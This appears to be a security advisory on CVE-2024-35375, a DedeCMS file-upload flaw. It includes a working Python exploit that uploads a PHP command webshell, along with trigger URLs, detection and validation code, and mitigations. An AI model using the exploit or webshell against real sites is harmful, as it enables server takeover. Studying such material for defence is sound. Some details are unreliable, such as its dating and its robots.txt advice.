
Overview

In June 2024, security researchers identified and disclosed a critical vulnerability in DedeCMS (version 5.7.114)—a popular CMS platform widely used in China and beyond. The flaw (CVE-2024-35375) allows attackers to upload arbitrary files—including malicious PHP shells—through the backend Media Add page (media_add.php). This can lead to full server compromise if leveraged correctly.

This article breaks down what CVE-2024-35375 is, why it is critical, how you can test for it (with code samples), and what steps to take to protect your DedeCMS site. All technical details below are for educational and defensive purposes only.

1. What is CVE-2024-35375?

CVE-2024-35375 is an arbitrary file upload vulnerability in the /dede/media_add.php page of DedeCMS v5.7.114. Normally, website administrators use this page to upload images and other permitted media files to the website. However, due to improper file extension checks and lack of security validations, an attacker with backend access can upload PHP scripts (or other dangerous files) to the server.

This means after a successful upload, the attacker’s payload can be executed on the server, allowing for remote code execution (RCE), web shell access, data theft, or further attacks.

The vulnerable page is typically located at

http://<target>/dede/media_add.php

You must be authenticated to reach this page. However, weak backend credentials or other vulnerabilities (like default/guessable passwords) could be abused to gain access.

2. Why is It Vulnerable?

The file upload form in media_add.php fails to strictly validate the MIME type and extension of uploaded files. While it is intended to accept only images, it actually lets any file (even one with a .php extension) through if the request is crafted in the right way.

3. Exploit Example

Below is an example exploit using Python and the popular requests library to upload a simple PHP webshell (shell.php) to a vulnerable DedeCMS:

import requests

url = 'http://target.com/dede/media_add.php'
cookies = {
    'DedeUserID': '1',          # Set your authenticated cookies here
    'DedeLoginTime': 'XXXXX',
    'PHPSESSID': 'yourphpsessid'
}

payload = {
    'title': 'Test Upload',
    'formhash': 'xxxxxx'        # DedeCMS uses anti-CSRF tokens; fetch it from HTML source if required
}

# Our malicious PHP file payload (simple webshell)
files = {
    'upfile': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php'),
}

response = requests.post(url, cookies=cookies, data=payload, files=files, verify=False)

if response.status_code == 200 and "上传成功" in response.text:
    print("File uploaded successfully!")
else:
    print("Upload failed. Check response:")
    print(response.text)

After upload, the file is often placed in

http://target.com/uploads/media/shell.php

*(The folder path may vary depending on configs.)*

Trigger the webshell:
Visit: http://target.com/uploads/media/shell.php?cmd=whoami
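From the defender's side, the sequence above (a POST to /dede/media_add.php followed by a GET to a script file under /uploads/) leaves a recognizable trace in the web server access log. The following detection script is an added example written for this article; it is not code from the original post, from any public PoC, or from DedeCMS. It parses combined-format log lines and flags requests for PHP-executable files under the upload directory, rating them higher when the same client IP had earlier posted to the upload endpoint. The log lines, IPs, timestamps and user agents are constructed; the paths are the ones named in this article.

```python
import re

# Constructed sample lines in combined log format (not real traffic); the request
# paths are the ones described in the article, the IPs and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2024:10:01:02 +0000] "GET /dede/login.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2024:10:01:09 +0000] "POST /dede/media_add.php HTTP/1.1" 200 812 "-" "python-requests/2.31.0"
203.0.113.7 - - [10/Jun/2024:10:01:15 +0000] "GET /uploads/media/shell.php?cmd=whoami HTTP/1.1" 200 40 "-" "python-requests/2.31.0"
198.51.100.4 - - [10/Jun/2024:10:05:00 +0000] "POST /dede/media_add.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jun/2024:10:05:03 +0000] "GET /uploads/media/banner.jpg HTTP/1.1" 200 23411 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Jun/2024:11:00:00 +0000] "GET /uploads/media/old.phtml HTTP/1.1" 404 153 "-" "curl/8.0"
"""

# Apache/Nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Extensions a PHP-enabled web server would execute; matched just before a query string or end of path.
SCRIPT_EXT_RE = re.compile(r'\.(?:php\d?|phtml|phar)(?:\?|$)')

UPLOAD_ENDPOINT = "/dede/media_add.php"   # the vulnerable page named in the article
UPLOAD_DIR_PREFIX = "/uploads/"           # default upload location named in the article (may vary per config)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_upload_then_execute(log_text):
    """Scan log text in order and return one finding per request for a script file
    under the upload directory. Severity is 'high' when the same client IP earlier
    POSTed to the media upload endpoint, 'medium' otherwise (a 404 is still worth a look:
    it can mean a probe for a shell that was already removed)."""
    first_post = {}   # client IP -> timestamp of its first POST to the upload endpoint
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].lower()
        if rec["method"] == "POST" and path.split("?")[0] == UPLOAD_ENDPOINT:
            first_post.setdefault(rec["ip"], rec["ts"])
        elif path.startswith(UPLOAD_DIR_PREFIX) and SCRIPT_EXT_RE.search(path):
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "path": rec["path"],
                "status": int(rec["status"]),
                "severity": "high" if rec["ip"] in first_post else "medium",
                "uploaded_at": first_post.get(rec["ip"]),
            })
    return findings


if __name__ == "__main__":
    for f in find_upload_then_execute(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['ip']} {f['ts']} {f['path']} -> HTTP {f['status']}")
```

Run against a real log, the script reports the 203.0.113.7 session as high severity (upload followed by execution) and the stray .phtml probe as medium; the legitimate image request from 198.51.100.4 produces nothing. Adjust UPLOAD_DIR_PREFIX if your installation stores media elsewhere.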

4. How to Find the Upload Directory

Look for upload paths in the response HTML, DedeCMS configs, or just try the /uploads/media/ directory. The response to the POST request may also tell you the exact location.

Mitigation & Recommendation

- Update DedeCMS: As of this writing (June 2024), check official DedeCMS security notices for patches or newer versions.
- Restrict Backend Access: Block the /dede folder in your robots.txt, use strong passwords and network restrictions, and enable MFA.
- File Upload Validation: Apply strict whitelisting for allowed file extensions on the server-side. Never trust client-side controls.
- Server Permissions: Ensure your upload directories do not allow execution of scripts (php_flag engine off in .htaccess for Apache).
- Monitor/Scan: Use tools like AWVS or Burp Suite to scan your site for similar flaws.
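The validation and permission bullets above state the fix in the abstract. As an added illustration (my own code, not DedeCMS's upload handler or any official patch), the Python below shows what strict server-side upload validation looks like in practice: an extension allow-list, a magic-byte check on the content, rejection of null bytes and double extensions such as x.php.jpg, refusal of any file containing a PHP open tag regardless of its extension, and a server-chosen random filename so the client's name never reaches the filesystem. It also includes a small audit routine that walks an existing upload directory and lists files that should not be there, a cheap first check for a site that may already have been hit. The size limit, extension lists and directory layout are assumptions for the example; disabling script execution in the upload directory, as the list above recommends, is still needed as a second layer.

```python
import os
import re
import secrets

# Allow-list: permitted extension -> magic-byte prefixes the content must start with.
# (Assumed set for this example; extend to whatever media your site really needs.)
ALLOWED_TYPES = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}

# Extensions a PHP-enabled server may execute or that change server behaviour.
# Checked against every dot-separated part of a name, so x.php.jpg is refused too.
SCRIPT_EXT_RE = re.compile(r"^(?:php\d?|phtml|phar|htaccess)$")

# PHP open tags; a file carrying these is refused even if its magic bytes are valid.
PHP_TAG_RE = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)

MAX_BYTES = 5 * 1024 * 1024  # assumed size limit for this example


class UploadRejected(ValueError):
    pass


def validate_upload(filename, content):
    """Server-side validation. Returns the canonical extension or raises UploadRejected.
    The client-supplied MIME type is ignored on purpose: only the name and the bytes count."""
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or "\x00" in name:
        raise UploadRejected("empty filename or null byte in filename")
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        raise UploadRejected("missing extension")
    ext = parts[-1]
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension .{ext} is not on the allow-list")
    if any(SCRIPT_EXT_RE.match(p) for p in parts[:-1]):
        raise UploadRejected("script extension hidden inside filename")
    if len(content) > MAX_BYTES:
        raise UploadRejected("file too large")
    if not any(content.startswith(sig) for sig in ALLOWED_TYPES[ext]):
        raise UploadRejected(f"content does not look like a .{ext} file")
    if PHP_TAG_RE.search(content):
        raise UploadRejected("embedded PHP open tag")
    return ext


def is_accepted(filename, content):
    """Boolean wrapper around validate_upload for callers that only need yes/no."""
    try:
        validate_upload(filename, content)
        return True
    except UploadRejected:
        return False


def stored_name(ext):
    """Random server-chosen name: 32 hex chars plus the validated extension."""
    return f"{secrets.token_hex(16)}.{ext}"


def audit_entries(entries):
    """Audit (relative_path, leading_bytes) pairs taken from an upload directory and
    return the paths that should not be there: script extensions or PHP open tags."""
    suspicious = []
    for rel_path, head in entries:
        parts = os.path.basename(rel_path).lower().split(".")
        if any(SCRIPT_EXT_RE.match(p) for p in parts[1:]) or PHP_TAG_RE.search(head):
            suspicious.append(rel_path)
    return suspicious


def audit_upload_dir(root, head_bytes=4096):
    """Walk a real upload directory (e.g. uploads/media) and audit the first bytes of each file."""
    entries = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            with open(full, "rb") as fh:
                entries.append((os.path.relpath(full, root), fh.read(head_bytes)))
    return audit_entries(entries)


if __name__ == "__main__":
    # Constructed inputs: a PHP shell under an image name, and a genuine PNG header.
    print(is_accepted("shell.php.jpg", b"\xff\xd8\xff" + b"<?php echo 1; ?>"))  # False
    print(validate_upload("logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32))        # png
    print(stored_name("png"))
```

Use validate_upload at the server-side upload handler and write the file under the name returned by stored_name; run audit_upload_dir against the live upload tree during incident triage or as a scheduled check.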

Original References

- CVE Record: NVD Entry
- Chinese Community Report: Seebug Advisory (In Chinese)
- DedeCMS Official Page: https://www.dedecms.com/
- PoC (Proof of Concept): GitHub Gist - Arbitrary File Upload

Bottom Line

CVE-2024-35375 is a high-risk, easy-to-exploit vulnerability in DedeCMS v5.7.114 with public proof-of-concept exploit code. If your site runs this software, patch immediately or implement temporary mitigations to stay protected. If you’re a developer or security pro, consider running a code audit on all file-upload points and applying strict validation.

*Stay vigilant, stay updated, and never trust file uploads!*


*Disclaimer: This article is for security research and defense only. Do not use information herein to attack systems without permission.*

Timeline

Published on: 05/23/2024 19:16:01 UTC
Last modified on: 11/21/2024 15:15:30 UTC